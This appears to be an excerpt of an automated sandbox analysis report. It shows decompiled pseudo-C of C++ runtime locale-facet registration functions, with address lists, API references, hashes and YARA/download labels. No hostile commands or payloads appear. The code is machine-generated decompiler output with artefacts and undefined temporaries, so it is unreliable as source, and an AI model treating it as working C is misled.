																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6D49C295(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6D461438(_t245);
																						E6D4A3D74(_t286 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6d4ec414;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6D49D028(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6D4A0075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6D486FD3(__eflags, _t271);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6d546e44 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6D486FD3(__eflags, _t270);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6d546e40 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6D486FD3(__eflags, _t269);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6d546e38 = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6D486FD3(__eflags, _t268);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6d546e3c = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6D486FD3(__eflags, _t267);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6d546e34 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6D486FD3(__eflags, _t266);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6d546e30 = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

0x6d49b898
0x6d49b898
0x6d49b89f
0x6d49b8a9
0x6d49b8ae
0x6d49b8b9
0x6d49b8bd
0x6d49b8c0
0x6d49b8c5
0x6d49b8c9
0x6d49b8ce
0x6d49b8d2
0x6d49b917
0x6d49b91a
0x6d49b926
0x6d49b8d4
0x6d49b8d6
0x6d49b8dc
0x6d49b8e2
0x6d49b8ea
0x6d49b8ed
0x6d49b92a
0x6d49b938
0x6d49b93d
0x6d49b945
0x6d49b94f
0x6d49b954
0x6d49b95f
0x6d49b963
0x6d49b966
0x6d49b96b
0x6d49b974
0x6d49b976
0x6d49b978
0x6d49b9bd
0x6d49b9c0
0x6d49b9cc
0x6d49b97a
0x6d49b97a
0x6d49b97c
0x6d49b982
0x6d49b988
0x6d49b990
0x6d49b993
0x6d49b9d0
0x6d49b9de
0x6d49b9e3
0x6d49b9eb
0x6d49b9f5
0x6d49b9fa
0x6d49ba05
0x6d49ba09
0x6d49ba0c
0x6d49ba11
0x6d49ba1a
0x6d49ba1c
0x6d49ba1e
0x6d49ba63
0x6d49ba66
0x6d49ba72
0x6d49ba20
0x6d49ba20
0x6d49ba22
0x6d49ba28
0x6d49ba2e
0x6d49ba36
0x6d49ba39
0x6d49ba76
0x6d49ba84
0x6d49ba89
0x6d49ba91
0x6d49ba9b
0x6d49baa0
0x6d49baab
0x6d49baaf
0x6d49bab2
0x6d49bab7
0x6d49bac0
0x6d49bac2
0x6d49bac4
0x6d49bb09
0x6d49bb0c
0x6d49bb18
0x6d49bac6
0x6d49bac6
0x6d49bac8
0x6d49bace
0x6d49bad4
0x6d49badc
0x6d49badf
0x6d49bb1c
0x6d49bb2a
0x6d49bb2f
0x6d49bb37
0x6d49bb41
0x6d49bb46
0x6d49bb51
0x6d49bb55
0x6d49bb58
0x6d49bb5d
0x6d49bb66
0x6d49bb68
0x6d49bb6a
0x6d49bbaf
0x6d49bbb2
0x6d49bbbe
0x6d49bb6c
0x6d49bb6c
0x6d49bb6e
0x6d49bb74
0x6d49bb7a
0x6d49bb82
0x6d49bb85
0x6d49bbc2
0x6d49bbd0
0x6d49bbd5
0x6d49bbdd
0x6d49bbe7
0x6d49bbec
0x6d49bbf7
0x6d49bbfb
0x6d49bbfe
0x6d49bc03
0x6d49bc0c
0x6d49bc0e
0x6d49bc10
0x6d49bc55
0x6d49bc58
0x6d49bc64
0x6d49bc12
0x6d49bc12
0x6d49bc14
0x6d49bc1a
0x6d49bc20
0x6d49bc28
0x6d49bc2b
0x6d49bc65
0x6d49bc68
0x6d49bc76
0x6d49bc7b
0x6d49bc83
0x6d49bc88
0x6d49bc8a
0x6d49bc90
0x6d49bc93
0x6d49bc9c
0x6d49bc9c
0x6d49bc9c
0x6d49bca0
0x6d49bca6
0x6d49bca9
0x6d49bcb5
0x6d49bc2d
0x6d49bc2d
0x6d49bc30
0x6d49bc34
0x6d49bc38
0x6d49bc45
0x6d49bc4d
0x6d49bc4f
0x00000000
0x6d49bc4f
0x6d49bc16
0x6d49bc16
0x00000000
0x6d49bc16
0x6d49bc14
0x6d49bb87
0x6d49bb87
0x6d49bb8a
0x6d49bb8e
0x6d49bb92
0x6d49bb9f
0x6d49bba7
0x6d49bba9
0x00000000
0x6d49bba9
0x6d49bb70
0x6d49bb70
0x00000000
0x6d49bb70
0x6d49bb6e
0x6d49bae1
0x6d49bae1
0x6d49bae4
0x6d49bae8
0x6d49baec
0x6d49baf9
0x6d49bb01
0x6d49bb03
0x00000000
0x6d49bb03
0x6d49baca
0x6d49baca
0x00000000
0x6d49baca
0x6d49bac8
0x6d49ba3b
0x6d49ba3b
0x6d49ba3e
0x6d49ba42
0x6d49ba46
0x6d49ba53
0x6d49ba5b
0x6d49ba5d
0x00000000
0x6d49ba5d
0x6d49ba24
0x6d49ba24
0x00000000
0x6d49ba24
0x6d49ba22
0x6d49b995
0x6d49b995
0x6d49b998
0x6d49b99c
0x6d49b9a0
0x6d49b9ad
0x6d49b9b5
0x6d49b9b7
0x00000000
0x6d49b9b7
0x6d49b97e
0x6d49b97e
0x00000000
0x6d49b97e
0x6d49b97c
0x6d49b8ef
0x6d49b8ef
0x6d49b8f2
0x6d49b8f6
0x6d49b8fa
0x6d49b907
0x6d49b90f
0x6d49b911
0x00000000
0x6d49b911
0x6d49b8d8
0x6d49b8d8
0x00000000
0x6d49b8d8
0x6d49b8d6

APIs

__EH_prolog3.LIBCMT ref: 6D49B89F
std::_Lockit::_Lockit.LIBCPMT ref: 6D49B8A9
int.LIBCPMT ref: 6D49B8C0

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D49B8FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49B91A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49B938

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: cfbf9278a1ca9ca13abb159bbccb05642850adedca58161f3d9a7770883b46f8
Instruction ID: 472d440e90e5c5bfb0b0c7551b0eb9d94885c0afcfde7968bfb20ed78ac64360
Opcode Fuzzy Hash: cfbf9278a1ca9ca13abb159bbccb05642850adedca58161f3d9a7770883b46f8
Instruction Fuzzy Hash: C711E3758181599BCF00EBA0C840FEEBBB5AF95314F1A400CD611BB391CB749E0187D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48FB3D, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6D48FB3D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t154 - 0x14, 0);
				_t147 =  *0x6d546dcc; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6D46161C(0x6d546d80);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6D46171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6D4866BA(_t154 - 0x14);
					return E6D4A0075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6D491558(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t154 - 0x20);
							E6D4A3D74(_t154 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t143, _t147, 0x14);
							E6D486653(_t154 - 0x14, 0);
							_t148 =  *0x6d546e00; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6D46161C(0x6d546dac);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6D46171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6D4866BA(_t154 - 0x14);
								return E6D4A0075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6D4915C4(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t154 - 0x20);
										E6D4A3D74(_t154 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t110, _t144, _t148, 0x14);
										E6D486653(_t154 - 0x14, 0);
										_t149 =  *0x6d546dd0; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6D46161C(0x6d546d60);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6D46171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6D4866BA(_t154 - 0x14);
											return E6D4A0075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6D49162A(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6D461438(_t131);
													E6D4A3D74(_t154 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6d4ec0c4;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6D49542F(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6D4A0075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6D486FD3(__eflags, _t145);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6d546dd0 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6D486FD3(__eflags, _t144);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6d546e00 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6D486FD3(__eflags, _t143);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6d546dcc = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

0x6d48fb3d
0x6d48fb3d
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb6e
0x6d48fb73
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b

APIs

__EH_prolog3.LIBCMT ref: 6D48FB44
std::_Lockit::_Lockit.LIBCPMT ref: 6D48FB4E
int.LIBCPMT ref: 6D48FB65

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48FB9F
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48FBBF
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48FBDD

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 3a2f8599625f501159c4651e144431b9a8b31ede5359f5da329e35a44bd1b449
Instruction ID: 2584654cb72cbbd84590999cae6866bd55ae825cd5f0c39a4658e4570ec58ae0
Opcode Fuzzy Hash: 3a2f8599625f501159c4651e144431b9a8b31ede5359f5da329e35a44bd1b449
Instruction Fuzzy Hash: 231102B680815A9BCF05EBA4C854FEDB774AF94314F2A440DD612BB392DB70DE008BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48FBE3, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6D48FBE3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t110 - 0x14, 0);
				_t105 =  *0x6d546e00; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6D46161C(0x6d546dac);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6D46171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6D4866BA(_t110 - 0x14);
					return E6D4A0075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6D4915C4(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t110 - 0x20);
							E6D4A3D74(_t110 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t102, _t105, 0x14);
							E6D486653(_t110 - 0x14, 0);
							_t106 =  *0x6d546dd0; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6D46161C(0x6d546d60);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6D46171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6D4866BA(_t110 - 0x14);
								return E6D4A0075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6D49162A(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6D461438(_t93);
										E6D4A3D74(_t110 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6d4ec0c4;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6D49542F(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6D4A0075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6D486FD3(__eflags, _t103);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6d546dd0 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6D486FD3(__eflags, _t102);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6d546e00 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

0x6d48fbe3
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc14
0x6d48fc19
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21

APIs

__EH_prolog3.LIBCMT ref: 6D48FBEA
std::_Lockit::_Lockit.LIBCPMT ref: 6D48FBF4
int.LIBCPMT ref: 6D48FC0B

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48FC45
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48FC65
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48FC83

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 53520635b23175b7c4b452ac05ad3b8028138148d07f09d84d04940d71848beb
Instruction ID: 45f83649875276f5273acb5ab3468fcf003a3e0f775572dacf8ff23bbaeec4d9
Opcode Fuzzy Hash: 53520635b23175b7c4b452ac05ad3b8028138148d07f09d84d04940d71848beb
Instruction Fuzzy Hash: 5211A3758081659BCF05EBA4C844EEEB7B5BF94354F1A400CD611A7391DB75DE01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48FA97, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48FA97(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t198 - 0x14, 0);
				_t189 =  *0x6d546dfc; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6D46161C(0x6d546da8);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6D46171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6D4866BA(_t198 - 0x14);
					return E6D4A0075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6D4914EC(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t198 - 0x20);
							E6D4A3D74(_t198 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t184, _t189, 0x14);
							E6D486653(_t198 - 0x14, 0);
							_t190 =  *0x6d546dcc; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6D46161C(0x6d546d80);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6D46171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6D4866BA(_t198 - 0x14);
								return E6D4A0075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6D491558(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t198 - 0x20);
										E6D4A3D74(_t198 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t141, _t185, _t190, 0x14);
										E6D486653(_t198 - 0x14, 0);
										_t191 =  *0x6d546e00; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6D46161C(0x6d546dac);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6D46171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6D4866BA(_t198 - 0x14);
											return E6D4A0075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6D4915C4(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t198 - 0x20);
													E6D4A3D74(_t198 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t141, _t186, _t191, 0x14);
													E6D486653(_t198 - 0x14, 0);
													_t192 =  *0x6d546dd0; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6D46161C(0x6d546d60);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6D46171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6D4866BA(_t198 - 0x14);
														return E6D4A0075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6D49162A(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6D461438(_t169);
																E6D4A3D74(_t198 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
